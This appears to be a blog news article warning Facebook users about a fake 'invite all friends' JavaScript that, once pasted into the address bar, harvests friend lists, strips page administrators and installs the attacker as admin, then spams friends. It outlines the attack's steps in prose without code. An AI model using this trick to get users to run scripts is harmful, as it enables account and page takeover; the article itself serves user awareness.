When you have a Facebook event and want to invite all your Friends it can get very tedious, especially if you have lots of Friends. There were/are a number of short cuts in the form of JavaScripts floating around the internet that allowed/allows you to invite all your friends with one click.

Often the published JavaScript no longer works after a short time and users’ end up on Google trying to find a new working script.

This is a much needed option from Facebook but not given for the obvious spamage that would occur.

Now one hacker in Albania has taken users need for the one-click ‘invite all’ JavaScript and turned it into malicious malware. The malware is on a Facebook Page called: How To Make “Suggest To Friends” New Javascript. The title would lead you to believe that the sript will invite all their friends to an event. However after you enter the script into the address bar a whole host of nasty things happen.

We were alerted of the malware by Roeland Landegent from Shoudio and TodaysArt. A colleague from TodaysArt had fallen victim whilst trying to invite Friends from an event hosted on its Page. The script  had removed all the admins and replaced it with the malicious site owner.

This is what else Landegent told us the JavaScript did, it:

  • Collects a list of friends of the user
  • Collects a list of all pages the current user administers
  • Loops through this list of pages and removes all administrators (because you can as administrator)
  • Makes a new administrator of the pages by assigning it to an email address (which corresponds with a Facebook user)
  • Posts a message to your friends, promoting an Albanian site..

After losing control of their Facebook Page Landegent went on to track down the culprit. In the process he learnt from the hacker that thousands of people fall victim to the malicious script every day. Luckily Landegent was able to get back control of the Page.

Here is a conversation Landgent recorded with the Albanian and watch out for the amusing talk of hiphop to engage the hacker in returning back what was stolen:

The most chilling part of that conversation is when the rapper-hacker says:

“I discovered that facebook.com allowed many thinks [things] that destroy the other accounts”

The malicious script has been removed from that Page but it is unknown how many other places the JavaScript is located.

(This is the JavaScript that you must avoid on Pastie.org)